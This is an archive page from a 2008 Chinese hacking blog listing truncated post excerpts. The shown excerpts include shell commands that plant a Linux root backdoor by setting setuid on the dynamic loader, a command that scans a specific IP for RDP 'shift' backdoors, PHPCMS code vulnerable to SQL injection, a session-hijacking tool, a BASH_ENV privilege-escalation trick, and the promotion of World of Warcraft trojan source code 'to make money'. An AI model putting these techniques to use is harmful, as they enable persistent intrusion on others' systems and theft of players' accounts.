2008年9月 的日志

JSky beta版本发布(针对所有互联网用户)

非常高兴的宣布JSky这一完全免费的Web应用漏洞扫描软件终于进入beta版本了。此时对所有互联网的朋友开放使用。下载请到http://www.nosec.org/web/jsky

很感谢在alpha版本中提出了宝贵 意见的朋友,不管是马甲也好、NOSEC的FANS也好,从大家对JSky的关注情况来看确实令我感到万分的欣慰。本次beta版本除了解决了alpha 版本中朋友反馈的一些问题以外,也添加和完善一些功能。希望大家喜欢,enjoy it.
阅读全文 »

Tags:

linux下留本地后门的两个方法

鬼仔注:刚找xiaoyu要了文中所说的test文件,另外xiaoyu也发了我一个视频,一块放上来,下载地址:testfstab后门视频.rar。test备份地址

作者:xi4oyu

方法一:setuid的方法,其实8是很隐蔽。看看过程:

[root@localdomain lib]# ls -l |grep ld-linux
lrwxrwxrwx 1 root root       9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so
lrwxrwxrwx 1 root root      13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.2
[root@localdomain lib]# chmod +s ld-linux.so.2
[root@localdomain lib]# ls -l |grep ld-2.7.so
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so
lrwxrwxrwx 1 root root       9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so
[root@localdomain lib]#
我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。
阅读全文 »

Tags: ,

3389的SHIFT后门自动扫描

来源:cloie

首先3389的SHIFT后门极少
其次大部分SHIFT后门都加密

所以手工一个一个尝试是挺傻的,写成自动扫描的话,还能让人忍受
下载ftp://ftp.microsoft.com/ResKit/win2000/roboclient.zip
smclient -f:shift_backdoor.txt -s:125.91.15.254 -l:1 -v -d
阅读全文 »

Tags: ,

PHPCMS2007 SP6 vote模块SQL注射漏洞

作者:Ryat
来源:狼族论坛

好久没在论坛发什么东西了,今天中秋满月,发个小漏洞:)

漏洞代码:

vote/vote.php

// 22行
$optionids = is_array($op) ? implode(',',$op) : $op;
...
$db->query("UPDATE ".TABLE_VOTE_OPTION." SET number = number+1 WHERE optionid IN ($optionids) ");

阅读全文 »

Tags: , ,

MaxHijack 1.4

作者:cnqing

No Arp欺骗的会话劫持工具,支持上行,下行双向劫持。

发布时间: 2008年9月12日

更新:
整合Httphijack 的功能并大大提高效率;
增加上行劫持方式 即可用于服务器网络;
更新引擎库;
阅读全文 »

Tags: ,

提权用的一个技巧

作者:xi4oyu

一个linux提权用的技巧,放出来全当找工作攒RP了。

OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本

一个test:
阅读全文 »

Tags: ,

Mysql charset Truncation vulnerability

Mysql charset Truncation vulnerability

By http://www.80sec.com/

We found that there is a interesting feature in mysql database,when you are using utf8,gbk or other charsets.This feature may make your application unsecure.

Stefen Esser shows some attack manners of mysql in his paper[1], in which he issues the SQL Column Truncation vulnerability.

The application is a forum where new users can register
The administrator’s name is known e.g. ‘admin’
MySQL is used in the default mode
There is no application restriction on the length of new user names
The database column username is limited to 16 characters
阅读全文 »

Tags: ,

美服,欧服WOW木马核心源代码,游戏版本v2.4.3.8606

文章作者:asm (MSN:[email protected]
信息来源:邪恶八进制

对应游戏版本v2.4.3.8606。这个只是核心代码,而非完整代码,通过调式完全可以写出美服跟欧服的WOW马来,大家发财去吧
阅读全文 »

Tags: , ,